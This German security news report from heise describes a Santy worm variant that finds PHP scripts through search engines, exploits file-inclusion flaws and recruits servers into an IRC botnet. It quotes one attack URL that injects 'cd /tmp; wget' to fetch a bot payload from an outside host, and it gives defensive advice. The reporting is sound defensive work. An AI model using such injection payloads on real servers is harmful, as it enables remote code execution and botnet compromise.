Wurm attackiert PHP-Skripte [Update]
Die bereits gestern gemeldete Santy-Version attackiert systematisch PHP-Skripte. Unter anderem verbindet sich der Wurm bei Erfolg mit einem IRC-Server und nimmt dort Befehle entgegen.
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
wget www.visualcoders.net/spybot.txt;
Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.
Update:
Der Hoster der missbrauchten Site hat aufgrund der Benachrichtigung durch heise Security die Skripte entfernt. Das Problem ist jedoch längst nicht beseitigt. Denn mittlerweile sind weitere Varianten des Wurms aktiv, die Code von anderen Sites nachladen. Die neuen Varianten nutzen teilweise auch andere Suchmaschinen, um PHP-Skripte aufzuspüren.
Der Wurm nutzt einen weit verbreiteten Programmierfehler, der dazu führt, dass ein Angreifer Dateien mit PHP-Code nachladen und ausführen können. Das Problem ist als "File Inclusion Vulnerability" bekannt und betrifft viele PHP-Skripte, die inlude- oder require-Befehle mit nicht ausreichend geprüften Variablen einsetzen. Wer Zugriff auf die Konfiguration des Web-Servers hat, kann sich durch Abschalten der Option allow_url_fopen in der Konfigurationsdatei php.ini gegen solche Attacken schützen. Das beschränkt den Zugriff von PHP auf lokale Dateien. Es bleibt allerdings das Risiko, dass beispielsweise lokale Dateien ausgespäht werden. Deshalb ist es grundsätzlich erforderlich, alle Variablen, die extern gesetzt werden, sorgfältig zu prüfen.
Siehe dazu auch: (ju)
- Bericht auf Full Disclosure
